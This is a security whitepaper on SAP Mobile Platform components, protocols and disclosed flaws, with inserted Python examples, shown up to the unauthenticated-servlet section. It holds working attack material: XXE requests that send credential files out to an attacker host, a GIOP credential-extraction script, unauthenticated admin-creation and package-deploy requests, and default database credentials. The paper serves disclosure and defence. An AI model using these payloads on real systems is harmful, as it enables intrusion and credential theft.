SAP Mobile Platform Security

Dmitry Chastukhin, Vahagn Vardanyan

www.erpscan.com

SAP Mobile Platform Security 2016

Disclaimer

According to the partnership agreement between ERPScan and SAP, our company is not entitled to publish any specific and detailed information about detected vulnerabilities before SAP releases an appropriate patch. This whitepaper will only include the details of those vulnerabilities that we have the right to publish as of the release date. However, you can see additional examples of exploitation, which prove the existence of the vulnerabilities, by following us at conferences as well as at ERPScan.com [1].

The research was conducted by ERPScan as a part of its contribution to the EAS-SEC non-profit organization, which is focused on Enterprise Application Security awareness.

This document or any of its fragments cannot be reproduced in whole or in part without prior written consent of EAS-SEC. SAP SE is neither the author nor the publisher of this whitepaper and is not responsible for its content. EAS-SEC and ERPScan are not responsible for any damage that can be incurred by attempting to test the vulnerabilities described in this document. This publication contains references to SAP SE products. SAP NetWeaver and other SAP products and services mentioned herein are trademarks or registered trademarks of SAP SE in Germany.

Our SAP security surveys go beyond this whitepaper. You can find the latest statistics reports related to SAP services on the Internet and other endeavors of the ERPScan Research on ERPScan’s blog [2] and on EAS-SEC project’s website [3].


CONTENTS

1. Introduction
   1.1. What is the client platform supported by SMP/SUP?
   1.2. Architecture
        1.2.1. Devices
        1.2.2. Management Console (Sybase Control Center, SCC)
        1.2.3. SAP Solution Manager / Change and Transport System (CTS)
        1.2.4. SAP Mobile Workspace / Agentry Editor / other development
        1.2.5. SAP Mobile Platform 2.3
               1.2.5.1. Mobile Business Objects
               1.2.5.2. Hybrid Web Container
               1.2.5.3. OData interface
               1.2.5.4. Agentry / Agentry applications
2. SAP Mobile Platform protocols
   2.1. SMP Messaging
   2.2. SMP Replication
   2.3. HTTP REST API
   2.4. SAP Agentry
   2.5. SMP services
   2.6. SAP Control Center 3.2.7
   2.7. SAP Mobile Platform CacheDB and SAP Mobile Platform SampleDB
   2.8. SAP Mobile Server
        2.8.1. mlsrv16.exe – MobiLink
        2.8.2. AdminWebServices.exe
        2.8.3. OBMO.exe
3. SAP Mobile Platform vulnerabilities
   3.1. Decrypting the SAP Mobile Platform GIOP protocol
   3.2. XXE in the SAP Mobile Platform portal page
   3.3. SAP Mobile Platform unauthenticated access to servlets
        Deploy packet
        Read logs
        Upload files
        Check deployment packet
4. SAP Sybase SQL Anywhere
5. SAP Mobile applications
   5.1. 4 interesting facts about SAP applications for Android
   5.2. SAP EMR Unwired SQL injection
        Injection in Projection
        Injection in Selection
        PoC
Conclusion
References
About ERPScan
About ERPScan Research Team
Our Contacts


1. INTRODUCTION

Mobile devices are increasingly being integrated into business processes. Although a BYOD policy is beneficial, the "mobilization" of enterprises inevitably brings integration and security problems, because there are many business systems and a heterogeneous fleet of devices.

SAP Mobile Platform (formerly Sybase Unwired Platform) is a MEAP (Mobile Enterprise Application Platform) solution. We will further refer to SAP Mobile Platform and Sybase Unwired Platform as SMP and SUP.

SMP/SUP helps companies with the following tasks:

• Integration – in development and deployment, the platform connects disparate data sources and business systems, with the option of caching data for fast delivery.

• Development – the platform includes tools for rapid development of client applications for various platforms.

• Monitoring – SAP Control Center, included in the platform, allows controlling deployed applications, the server environment, security access, and data transmission.

• Providing data – the platform lets mobile applications work with data both online and offline. Data is accessible from all modern mobile devices.

1.1. What is the client platform supported by SMP/SUP?

The server part of the system is available for Windows and Linux. Client applications, i.e. programs installed on smartphones, can be written in Objective-C for iOS, Java for Android and BlackBerry, and C# or other .NET Framework languages for Windows. Applications are developed with the SAP Mobile SDK and compiled for the desired platform.

1.2. Architecture

The figure below shows the general scheme of SMP. As you can see, SMP is the link between devices and business data. Let us look at each element separately.


Figure 1

1.2.1. Devices

Android, BlackBerry, iPhone/iPad and Windows/Windows Mobile devices are the end-user side. The client applications installed on them connect to SMP; they are distributed through Google Play, the Apple App Store or the Windows Store. SAP Afaria is an optional MDM solution. Clients connect to SMP over HTTP/HTTPS; before being sent, data is encapsulated in the tm or tm2 protocol.

1.2.2. Management Console (Sybase Control Center, SCC)

This is the portal administrators use to manage the SMP platform. The portal server runs the sccservice.exe process, which listens on ports 8282 and 8283 (the portal itself is reached over HTTPS on 8283).

1.2.3. SAP Solution Manager / Change and Transport System (CTS)

SAP Solution Manager is the standard platform for Application Lifecycle Management (ALM). It plays a decisive role within the ALM tools. Besides providing SAP functionality itself, SAP Solution Manager integrates the other tools to ensure a comprehensive approach. It enables the central access to all required functions and central availability of all required information.

Change and Transport System (CTS) is a tool that helps you to organize development projects in ABAP Workbench and in Customizing, and then transport the changes between the SAP systems in your system landscape. As well as ABAP objects, you can also transport Java objects (J2EE, JEE) and SAP-specific non-ABAP technologies (such as Web Dynpro Java or SAP NetWeaver Portal) in your landscape.


1.2.4. SAP Mobile Workspace / Agentry Editor / other development

These are standard plug-ins, developer tools, and development IDE for programming smartphone applications for SMP.

1.2.5. SAP Mobile Platform 2.3

Let us now consider the structure of the platform at the level of SMP supported applications.

1.2.5.1. Mobile Business Objects

Mobile Business Objects help to form business logic for mobile applications.

A mobile business object (MBO) is derived from a data source (such as a database server, web service, or SAP server). MBOs are deployed to Unwired Server and accessed from mobile device application clients.

MBOs include:

• Implementation-level details – metadata columns that contain information about the data from a data source.

• Abstract-level details – attributes that correspond to instance-level properties of a programmable object in the mobile client and map to data source output columns. Parameters correspond to synchronization parameters on the mobile client and map to data source arguments. For example, the output of an SQL SELECT query is mapped as attributes, and the arguments in the WHERE clause are mapped as synchronization parameters, so that the client can pass input to the query. MBO operations include parameters that map to data source input arguments. Operation parameters determine the information a client passes to the enterprise information system (EIS).

• Relationships defined between MBOs by linking attributes and parameters in one MBO to attributes and parameters in another MBO.

Applications for smartphones can be downloaded on Google Play and iTunes:

https://play.google.com/store/apps/details?id=com.sap.mobi

https://itunes.apple.com/ru/app/sap-businessobjects-mobile/id441208302?mt=8

1.2.5.2. Hybrid Web Container

Hybrid Web Container is the runtime on the device within which Mobile Workflows are executed.

The Hybrid Web Container is a native application that embeds a browser, which allows you to build applications with the simplicity of web development but utilize the power of native device services. The Hybrid Web Container enables the rapid development of mobile workflows, in which you can extend existing enterprise business processes to a mobile device so that business process decisions can be made on a mobile device.


1.2.5.3. OData interface

This interface is necessary for applications to interact with a server that uses OData.

1.2.5.4. Agentry / Agentry applications

A new development archetype for Agentry applications is integrated with SAP Mobile Platform. Developers use the Agentry Editor to create and modify applications and then deploy them to SAP Mobile Server. System administrators install, manage, and monitor applications using SAP Control Center.

Agentry applications provide the ability to:

• Support one or more client device types, and one or more enterprise information systems (EISs) of varying types, from a single application project.

• Configure and modify applications with minimal user impact.

• Develop simple or complex multi-screen workflows.

• Store high data volumes on client devices.

Each Agentry application has its own Agentry Server instance that runs on a SAP Mobile Server node.


2. SAP MOBILE PLATFORM PROTOCOLS

Considering the security of the SMP platform, let us start with an analysis of the protocols used for interactions between mobile applications and the SMP server.

Table 1. Protocols supported by platform version

Protocol           SUP 2.1.3   SUP 2.2   SMP 2.3   SMP 3.0
SMP Messaging          x           x         x         x
SMP Replication        x           x         x         x
HTTP REST API                      x         x         x
SAP Agentry                                  x         x

Figure 2

2.1. SMP Messaging

SMP Messaging is always compressed and encrypted.

Protocol:

• HTTP encapsulated (HTTPS is optional)

• Compressed and encrypted binary protocol

Encryption:

• 1024-bit asymmetric encryption

  − 1024-bit RSA public key exchange

  − 128-bit AES symmetric encryption of the payload

  − Data traffic (payload) is encrypted from SMP client to SMP server

  − Symmetric session keys are automatically renewed during a synchronization session

Note that 1024-bit RSA is below the 2048-bit minimum that NIST has recommended since 2013, so the key exchange itself is a weak point even when everything else is configured correctly.

2.2. SMP Replication

Replication traffic is encrypted with AES by default (SMP 2.1.3+).

• RSA for key exchange, 128 bit AES transport encryption (configurable in SCC).

• RSA public key is transported to SMP client via SMP Messaging.

• Traffic is HTTP with a binary payload, HTTPS encapsulation is optional.

• Devices need to be registered (via SMP Messaging) before data replication can take place.

• SMP installs with default RSA keys – you MUST change them!

2.3. HTTP REST API

The HTTP REST API uses regular HTTPS (SSL) for traffic encryption.

• REST API is a server side only API, no client side SMP-specific modules.

• HTTPS security level (SSL version) depends on the SSL endpoint and the client implementation.

• SSL for REST API traffic is often terminated on a customer’s reverse proxy or the SMP Relay Server.

2.4. SAP Agentry

SAP Agentry traffic can be encrypted with SSL.

• The Agentry server is either stand-alone or part of SMP (v. 2.3 and higher), depending on the SMP version.

• The Agentry traffic protocol is called ANGEL and is a custom binary protocol over TCP.

In normal operation, four services run on an SMP server; they are described in the next section.


2.5. SMP services

After installation and configuration of the standard SMP server, four services are installed:

• SAP Control Center 3.2.7

• SAP Mobile Platform CacheDB

• SAP Mobile Platform SampleDB

• SAP Mobile Server

A brief overview of what they do and why they are needed is below.

2.6. SAP Control Center 3.2.7

This service starts sccservice.exe for administrative functions. It listens on the following ports:

• 2100 – RMI port used for administrative connections. An administrator can connect to this port to do, for example, the following:

− Delete a package from the server

− Deploy a package to the server

− Export SUP objects from the server

− Import a SUP archive file to the server

You can also call a remote instance RMI method to gain access to other functions, like control logs and system monitoring. SMP servers contain a file sup-admin-client.jar that describes all methods that can be called by RMI.

• 8282/8283 – ports of the SMP portal (SCC). Through this portal you can manage applications, connections, and logs.

• 9999 – this port also accepts administrative RMI connections, like port 2100.


2.7. SAP Mobile Platform CacheDB and SAP Mobile Platform SampleDB

These services start SQL Anywhere databases. The database listens on port 5200. The standard account for connecting to the database is dba:sql (the SQL Anywhere default, which should be changed after installation). The complete connection string looks like this:

UID=dba;PWD=sql;Server=mobila23_primary;DBN=demo;ASTART=No;host=mobila23:5200

– where DBN is the database name and Server is the SQL Anywhere server name.

2.8. SAP Mobile Server

This service starts the following three services:

Figure 3

During our research, three active processes attracted our attention: mlsrv16.exe, OBMO.exe, and AdminWebServices.exe. Let’s see what they do and what their role in SMP is.

2.8.1. mlsrv16.exe – MobiLink

MobiLink is a session-based synchronization technology designed to synchronize UltraLite and SQL Anywhere remote databases with a consolidated database. Synchronization can occur over TCP/IP, HTTP, or HTTPS.

Figure 4


MobiLink allows choosing selected portions of the data for synchronization. MobiLink synchronization also allows you to resolve conflicts between changes made in different databases. The synchronization process is controlled by synchronization logic, which can be written as an SQL, Java, or .NET application. Each piece of logic is called a script. With scripts, for example, you can specify how uploaded data is applied to the consolidated database, what gets downloaded, and how different schemas and names between the consolidated and remote databases are handled. Event-based scripting provides great flexibility in the design of the synchronization process, including such features as conflict resolution, error reporting, and user authentication.

All changes can be uploaded in a single transaction and downloaded in a single transaction. At the end of each successful synchronization, the consolidated and remote databases are consistent. To preserve the order of transactions, you can also choose to have each transaction on the remote database uploaded as a separate transaction. Either a whole transaction is synchronized or none of it is synchronized. This ensures transactional integrity for each database.

Figure 5

The mlsrv16.exe process listens on ports 2000 and 5001. The initial connection is established during initialization; for subsequent data transmission and processing, the mobile application connects to this port and uses the SMP Messaging protocol.

2.8.2. AdminWebServices.exe

This process is an administrative service that listens on local port 5100, using Cassini Web Server 1.0 as the web server. It performs no authentication, so a single request from the local host is enough to carry out an administrative action; any process running on the server (or anything else that can reach 127.0.0.1:5100) can use it. For example, the following POST request creates an administrator in SMP:

POST /MobileOffice/Admin.asmx/AddAdminUser HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: length

strUserName=string&strActivationCode=string&iExpirationHours=string


2.8.3. OBMO.exe

Data from SQL Anywhere is received through port 5001 and first processed by the OBMO.exe process, which listens on port 5011. If everything is correct, OBMO.exe queries the database; the response is forwarded to mlsrv16.exe and then transmitted to the mobile device. OBMO.exe is written in .NET.


3. SAP MOBILE PLATFORM VULNERABILITIES

After this brief introduction, let us see what kinds of vulnerabilities were identified.

3.1. Decrypting the SAP Mobile Platform GIOP protocol

We have already mentioned mlsrv16.exe, the MobiLink server used primarily for data synchronization. It listens on port 2000, where remote (RMI) methods are invoked after authentication with a login and password. Let us analyze the traffic on this port: run Wireshark on the server and capture port 2000. The data transfer protocol turns out to be GIOP, and the USER and PASS fields are visible in the request body.

Figure 6


After some examination, we found the functions that encrypt and decrypt the account data. Having analyzed them, we wrote a simple script that turns the binary login or password data into plaintext.

Figure 7

Thus, we were able to decipher credentials transmitted via the GIOP protocol.
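The capture step above can be triaged without Wireshark once you know the GIOP framing. The following is an added example, not the ERPScan script and not SAP code: it decodes the 12-byte GIOP header (magic, version, flags with the byte-order bit, message type, message size, as defined by the CORBA GIOP specification that Java RMI-IIOP also speaks) and then scans a Request body for 4-byte-aligned CDR strings so that the USER and PASS fields can be paired with the values that follow them. Everything about the body layout is an assumption made for the demo: the sample request is constructed, its values are invented, and the PASS value is not SMP's real encoding, only a stand-in for the encrypted blob the paper decrypts.

```python
"""GIOP header triage for captures of the MobiLink port (2000).

Added example; not the ERPScan script and not SAP code. The 12-byte header
layout is the CORBA GIOP one (also what Java RMI-IIOP speaks). Everything
about the body is an assumption made for the demo: that the login fields are
CDR strings labelled USER and PASS, as in the paper's capture. The sample
request and its values are constructed; the PASS value is not SMP's real
encoding.
"""
import struct

GIOP_MAGIC = b"GIOP"
HEADER_LEN = 12
MESSAGE_TYPES = {0: "Request", 1: "Reply", 2: "CancelRequest", 3: "LocateRequest",
                 4: "LocateReply", 5: "CloseConnection", 6: "MessageError", 7: "Fragment"}


def _u32(little_endian: bool) -> str:
    return "<I" if little_endian else ">I"


def is_giop(data: bytes) -> bool:
    return len(data) >= HEADER_LEN and data[:4] == GIOP_MAGIC


def parse_giop_header(data: bytes) -> dict:
    """Decode the header; message_size is in the byte order announced by the flags byte."""
    if not is_giop(data):
        raise ValueError("not a GIOP message")
    major, minor, flags, msg_type = struct.unpack_from("BBBB", data, 4)
    little_endian = bool(flags & 0x01)     # bit 0 of flags: 1 = little endian
    size = struct.unpack_from(_u32(little_endian), data, 8)[0]
    return {"version": f"{major}.{minor}", "little_endian": little_endian,
            "type": MESSAGE_TYPES.get(msg_type, f"unknown({msg_type})"),
            "size": size, "body": data[HEADER_LEN:HEADER_LEN + size]}


def iter_cdr_strings(body: bytes, little_endian: bool, max_len: int = 4096):
    """Yield (offset, text) for every plausible CDR string at a 4-byte-aligned offset.

    A CDR string is a uint32 length (counting the terminating NUL), the bytes,
    the NUL, then padding to the next 4-byte boundary. Without the IDL this is a
    heuristic scan and can misfire on binary fields; it is meant for triage.
    """
    fmt = _u32(little_endian)
    for off in range(0, len(body) - 3, 4):
        n = struct.unpack_from(fmt, body, off)[0]
        if 2 <= n <= max_len and off + 4 + n <= len(body):
            raw = body[off + 4: off + 4 + n]
            text = raw[:-1]
            if raw[-1] == 0 and all(32 <= b < 127 for b in text):
                yield off, text.decode("ascii")


def extract_credentials(message: bytes) -> dict:
    """Pair each USER / PASS label with the string that follows it in a Request body."""
    header = parse_giop_header(message)
    if header["type"] != "Request":
        return {}
    strings = [text for _, text in iter_cdr_strings(header["body"], header["little_endian"])]
    return {label: value for label, value in zip(strings, strings[1:])
            if label in ("USER", "PASS")}


def cdr_string(text: str, little_endian: bool) -> bytes:
    """Encode one CDR string with its alignment padding (used to build the sample)."""
    raw = text.encode("ascii") + b"\x00"
    out = struct.pack(_u32(little_endian), len(raw)) + raw
    return out + b"\x00" * (-len(out) % 4)


def build_sample_request(little_endian: bool = True) -> bytes:
    """Constructed GIOP 1.2 Request carrying the two labelled fields; values are made up."""
    body = b"".join(cdr_string(s, little_endian)
                    for s in ("USER", "admin@system", "PASS", "a46559486a81350d"))
    flags = 0x01 if little_endian else 0x00
    header = GIOP_MAGIC + bytes([1, 2, flags, 0]) + struct.pack(_u32(little_endian), len(body))
    return header + body


if __name__ == "__main__":
    sample = build_sample_request()
    print({**parse_giop_header(sample), "body": "..."})
    print(extract_credentials(sample))
```

Feed extract_credentials() the TCP payload of each client-to-server segment (for example from tshark's data.data field) and it returns the two fields for Request messages and an empty dict for everything else; the PASS value it returns is still the encrypted form, which is exactly what the decryption script in Figure 7 consumes.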

3.2. XXE in the SAP Mobile Platform portal page

The SMP portal is located at https://IP_ADDR:8283/scc. It is an Adobe Flash Player application, and all data is transferred via the AMF protocol. The obvious way to look for a vulnerability in the portal would be to decompile main.swf, which is available at https://IP_ADDR:8283/scc/main.swf. That is laborious, so we went another way.

Let us look at the server’s web.xml file that describes all available services.

C:\SAP\SCC-3_2\services\EmbeddedWebContainer\container\Jetty-7.6.2.v20120308\work\jetty-0.0.0.0-8282-scc.war-_scc-any-\webapp\WEB-INF\web.xml

This file has a record:

<servlet-mapping>

<servlet-name>MessageBrokerServlet</servlet-name>

<url-pattern>/messagebroker/*</url-pattern>

</servlet-mapping>

Nothing in web.xml places a security-constraint on this URL pattern, so MessageBrokerServlet is reachable without authentication.

Also, there is a file:

C:\SAP\SCC-3_2\services\EmbeddedWebContainer\container\Jetty-7.6.2.v20120308\work\jetty-0.0.0.0-8282-scc.war-_scc-any-\webapp\WEB-INF\flex\services-config.xml

– which describes the paths to some servlets:

<channel-definition id="scc-polling-amf" class="mx.messaging.channels.AMFChannel">
    <endpoint url="http://{server.name}:{server.port}/scc/messagebroker/amfpolling" class="com.sybase.scc.remoting.SccAMFEndpoint" />
    <properties>
        <polling-enabled>true</polling-enabled>
        <polling-interval-seconds>4</polling-interval-seconds>
    </properties>
</channel-definition>

<channel-definition id="scc-secure-polling-amf" class="mx.messaging.channels.AMFChannel">
    <endpoint url="https://{server.name}:{server.port}/scc/messagebroker/amfsecurepolling" class="com.sybase.scc.remoting.SccSecureAMFEndpoint" />
    <properties>
        <polling-enabled>true</polling-enabled>
        <polling-interval-seconds>4</polling-interval-seconds>
        <flex-client-outbound-queue-processor class="com.sybase.scc.messaging.ManagedOutboundQueueProcessor" />
    </properties>
</channel-definition>

<channel-definition id="scc-http" class="mx.messaging.channels.HTTPChannel">
    <endpoint url="http://{server.name}:{server.port}/scc/messagebroker/http" class="flex.messaging.endpoints.HTTPEndpoint" />
</channel-definition>

<channel-definition id="scc-secure-http" class="mx.messaging.channels.SecureHTTPChannel">
    <endpoint url="https://{server.name}:{server.port}/scc/messagebroker/httpsecure" class="flex.messaging.endpoints.SecureHTTPEndpoint" />
    <properties>
        <add-no-cache-headers>false</add-no-cache-headers>
    </properties>
</channel-definition>

<channel-definition id="scc-long-polling-amf" class="mx.messaging.channels.AMFChannel">
    <endpoint url="http://{server.name}:{server.port}/scc/messagebroker/amflongpolling" class="com.sybase.scc.remoting.SccAMFEndpoint" />
    <properties>
        <polling-enabled>true</polling-enabled>
        <wait-interval-millis>-1</wait-interval-millis>
        <polling-interval-millis>100</polling-interval-millis>
        <max-waiting-poll-requests>50</max-waiting-poll-requests>
    </properties>
</channel-definition>

When we followed these links, no errors were displayed. In response, we got blank pages or, in the case of https://IP_ADDR:8283/scc/messagebroker/http, this:

<amfx ver="3">
    <body targetURI="" responseURI="">
        <null/>
    </body>
</amfx>

Why not attempt an XXE attack? Send the following request:

POST /scc/messagebroker/http HTTP/1.1
Host: IP_ADDR:8283

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://attacker_ip/malicious.xml">
%remote;]>
<root/>

The XXE attack works: the server fetches malicious.xml from attacker_ip, which by itself proves that the parser resolves external entities. The following servlets are vulnerable:

/scc/messagebroker/amfpolling

/scc/messagebroker/amfsecurepolling

/scc/messagebroker/http

/scc/messagebroker/httpsecure

/scc/messagebroker/amflongpolling

The vulnerable XML parser itself is available at:

C:\SAP\SCC-3_2\services\EmbeddedWebContainer\container\Jetty-7.6.2.v20120308\work\jetty-0.0.0.0-8282-scc.war-_scc-any-\webapp\WEB-INF\lib\flex-messaging-core.jar

The package that parsed XML is the flex.messaging.util package.

By exploiting this vulnerability, an attacker can read files that the SCC service account can access on the server, or cause a denial of service by sending an XML bomb (recursive entity expansion).
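To make the two outcomes above concrete, here is an added example in Python that is not code from the paper or from SAP: the real parser is the Java flex-messaging code in the SCC war, which is not reproduced here, so Python's xml.sax expat reader stands in for it. With external general entities switched on it fetches the SYSTEM entity and inlines the file into the document, the behaviour the /scc/messagebroker/* endpoints exposed; parse_hardened() shows the fix, refusing any DOCTYPE so that neither external entities nor entity-expansion bombs can be declared in the first place. The gateway.properties content, the temp-file location and the entity name are constructed for the demo.

```python
"""In-process demonstration of the XXE class behind the SCC finding, in Python.

Added example; the real parser is the Java flex-messaging code inside the SCC
war, which is not reproduced here. Python's xml.sax expat reader stands in for
it: with external general entities switched on it fetches the SYSTEM entity
and inlines the file, which is the behaviour the /scc/messagebroker/* endpoints
exposed; parse_hardened() shows the fix, refusing any DOCTYPE so that neither
external entities nor entity-expansion bombs can be declared. The
gateway.properties content is constructed, not SAP's real file.
"""
import io
import os
import tempfile
import xml.parsers.expat
import xml.sax
import xml.sax.handler
from pathlib import Path

# Constructed stand-in for the file the paper reads (names and values invented).
SAMPLE_PROPERTIES = "gateway.user=admin@system\ngateway.password=s3cret\n"


def make_secret_file(content: str = SAMPLE_PROPERTIES) -> str:
    """Write the constructed properties file into a fresh temp dir; returns its path."""
    path = os.path.join(tempfile.mkdtemp(), "gateway.properties")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(content)
    return path


def xxe_document(target_path: str) -> bytes:
    """Attacker document: one external general entity that points at target_path."""
    uri = Path(target_path).resolve().as_uri()   # file:///... as in the paper's payload
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE root [<!ENTITY xxe SYSTEM "{uri}">]>\n'
        "<root>&xxe;</root>"
    ).encode()


class _TextCollector(xml.sax.handler.ContentHandler):
    """Gathers character data, which is where the inlined file content ends up."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_with_entities(xml_bytes: bytes, resolve_external_entities: bool) -> str:
    """Parse like an application that trusts its input; the flag decides whether
    SYSTEM entities are fetched (True reproduces the vulnerable configuration)."""
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges, resolve_external_entities)
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.chunks)


def parse_hardened(xml_bytes: bytes) -> str:
    """Fixed version: a DOCTYPE aborts parsing before any entity can be declared.
    No ExternalEntityRefHandler is installed either, so nothing is ever fetched."""
    parser = xml.parsers.expat.ParserCreate()
    chunks = []

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise ValueError("DOCTYPE is not allowed in untrusted input")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.CharacterDataHandler = chunks.append
    parser.Parse(xml_bytes, True)
    return "".join(chunks)


def run_demo() -> dict:
    """Runs the three configurations against the same document and reports what leaked."""
    doc = xxe_document(make_secret_file())
    try:
        parse_hardened(doc)
        hardened_rejected = False
    except ValueError:
        hardened_rejected = True
    return {
        "vulnerable": parse_with_entities(doc, True),
        "entities_disabled": parse_with_entities(doc, False),
        "hardened_rejected": hardened_rejected,
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value!r}")
```

Disabling entity resolution (the middle configuration) is the minimum fix and is what most XML libraries offer as a switch; rejecting the DOCTYPE outright is the stricter option because it also closes the XML-bomb denial of service, which needs no external entity at all. For the Java parser in flex-messaging-core.jar the equivalent is the vendor patch referenced at the end of this section.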

Notably, there are files that store passwords in plain text. Here is the list of these files:

C:\SAP\MobilePlatform\Servers\UnwiredServer\Repository\Package\sup\sms\gateway.properties

C:\SAP\MobilePlatform\Servers\AgentryServer\Agentry.ini

C:\SAP\MobilePlatform\Servers\UnwiredServer\Repository\Instance\com\sybase\sup\server\SUPServer\sup.properties

C:\SAP\MobilePlatform\Servers\UnwiredServer\Repository\Instance\com\sybase\sup\server\SUPServer\supbackup.properties

Let us try to use XXE to read this file content:

C:\SAP\MobilePlatform\Servers\UnwiredServer\Repository\Package\sup\sms\gateway.properties

To carry out this attack, we need to send to the vulnerable XML parser (/scc/messagebroker/http) the following POST request:

POST /scc/messagebroker/http HTTP/1.1
Host: 172.16.30.6:8283
Content-Length: 142

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://172.16.2.67:8088/payload.xml">
%remote;]>
<root/>

The SAP server that receives this POST request fetches the file payload.xml from the server http://172.16.2.67:8088. That file contains:

<!ENTITY % payload SYSTEM "file:///C:\SAP\MobilePlatform\Servers\UnwiredServer\Repository\Package\sup\sms\gateway.properties">
<!ENTITY % param1 '<!ENTITY &#37; external SYSTEM "http://172.16.2.67:4444?%payload;" >' >
%param1;%external;

When the XML parser processes payload.xml, the SMP server reads the file C:\SAP\MobilePlatform\Servers\UnwiredServer\Repository\Package\sup\sms\gateway.properties, which contains the username and password of the admin@system account, and then transfers all of that data to http://172.16.2.67:4444.
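As an added, defender-side example (not code from this whitepaper, from ERPScan or from SAP), the following Python shows the two controls that stop this class of request: refusing any document that carries a DOCTYPE before a single entity is resolved, and flagging request bodies that declare external or parameter entities. The sample documents are constructed here; the second mirrors the shape of the request above with a placeholder host instead of a real address.

```python
import re
import xml.parsers.expat


class DtdNotAllowed(ValueError):
    """Raised for any document that declares a DOCTYPE."""


def parse_without_dtd(document: bytes) -> str:
    """Parse `document` with DTD processing forbidden; return the root element name.

    A DOCTYPE is the only carrier for external entities, parameter entities and
    entity-expansion bombs, and messagebroker traffic never needs one, so the
    document is rejected the moment a DOCTYPE starts, before any entity could
    be resolved.
    """
    parser = xml.parsers.expat.ParserCreate()
    root_name = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdNotAllowed("DOCTYPE %r rejected" % name)

    def on_start(name, attrs):
        if not root_name:
            root_name.append(name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    # Second line of defence: never fetch an external entity even if one is declared.
    parser.ExternalEntityRefHandler = lambda *args: 0
    parser.Parse(document, True)
    return root_name[0]


def is_rejected(document: bytes) -> bool:
    """True when parse_without_dtd refuses the document."""
    try:
        parse_without_dtd(document)
    except DtdNotAllowed:
        return True
    return False


# Request-body indicators of the technique: an external or parameter entity,
# or an unusual number of entity declarations (expansion bomb).
_EXTERNAL_ENTITY = re.compile(rb"<!ENTITY\s+(?:%\s*)?\S+\s+(?:SYSTEM|PUBLIC)\b", re.I)
_ANY_ENTITY = re.compile(rb"<!ENTITY\b", re.I)


def xxe_indicators(body: bytes, bomb_threshold: int = 10) -> list:
    """Return the reasons a request body looks like an XXE or XML-bomb attempt."""
    reasons = []
    if b"<!DOCTYPE" in body.upper():
        reasons.append("DOCTYPE present")
    if _EXTERNAL_ENTITY.search(body):
        reasons.append("external or parameter entity declared")
    if len(_ANY_ENTITY.findall(body)) >= bomb_threshold:
        reasons.append("many ENTITY declarations (possible expansion bomb)")
    return reasons


# Constructed samples: a benign message body and one shaped like the request
# above, with a placeholder host (attacker.example) instead of a real address.
SAFE_DOC = b'<?xml version="1.0" encoding="UTF-8"?><root/>'
XXE_DOC = (b'<?xml version="1.0" encoding="UTF-8"?>'
           b'<!DOCTYPE root [<!ENTITY % remote SYSTEM "http://attacker.example/payload.xml">'
           b'%remote;]><root/>')
```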

Figure 8

Let us read the content of this file using XXE:

C:\SAP\MobilePlatform\Servers\UnwiredServer\Repository\Instance\com\sybase\sup\server\SUPServer\sup.properties

Figure 9

Note the record sup.imo.upa = 457ba103a46559486a81350d552a9e47fb085927eb6df0ccc79231bc3d. This value is very similar to the encrypted message that is transmitted over the GIOP protocol (except for the first 2 bytes).

Figure 10

Now we have the password for the admin@system account.

ERPScan researchers talked at length about web.xml attacks at Black Hat USA 2011. The full report is available on our website.

A few words about SMP 3.0. It also has files that store passwords in plain text, and most importantly, these are not just test passwords but passwords for the Keystore.

Figure 11

This vulnerability is fixed by the SAP Security Note 2125358.

3.3. SAP Mobile Platform unauthenticated access to servlets

The SMP server has several web.xml files that describe a number of administrative services/servlets, all of which allow anonymous access. These services/servlets allow any user to read and create logs and reports, and to deploy and install JAR packages.

The vulnerability occurred because access rights were assigned incorrectly, so an attacker has access to the SysAdminWebTool servlet.

For example:

POST /sysadminwebtool/jarpkg HTTP/1.1
Host: 172.16.30.6:8283
Content-type: application/x-www-form-urlencoded

value=BASE_64_PACKET

An attacker could:

Deploy a package:

POST /sysadminwebtool/jarpkg HTTP/1.1
Host: 172.16.30.6:8283
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-type: application/x-www-form-urlencoded

value=BASE_64_PACKET

Read logs:

POST /sysadminwebtool/pull HTTP/1.1
Host: 172.16.30.6:8283
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-type: application/x-www-form-urlencoded

value=sup1494659006494619241.domainlog

Upload files:

POST /sysadminwebtool/push HTTP/1.1
Host: 172.16.30.6:8283
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------239992220524277

-----------------------------239992220524277
Content-Disposition: form-data; name="adminRequest"; filelename="filelename"

file_content=
-----------------------------239992220524277--

Check the deployment package:

POST /sysadminwebtool/wfhandle HTTP/1.1
Host: 172.16.30.6:8283
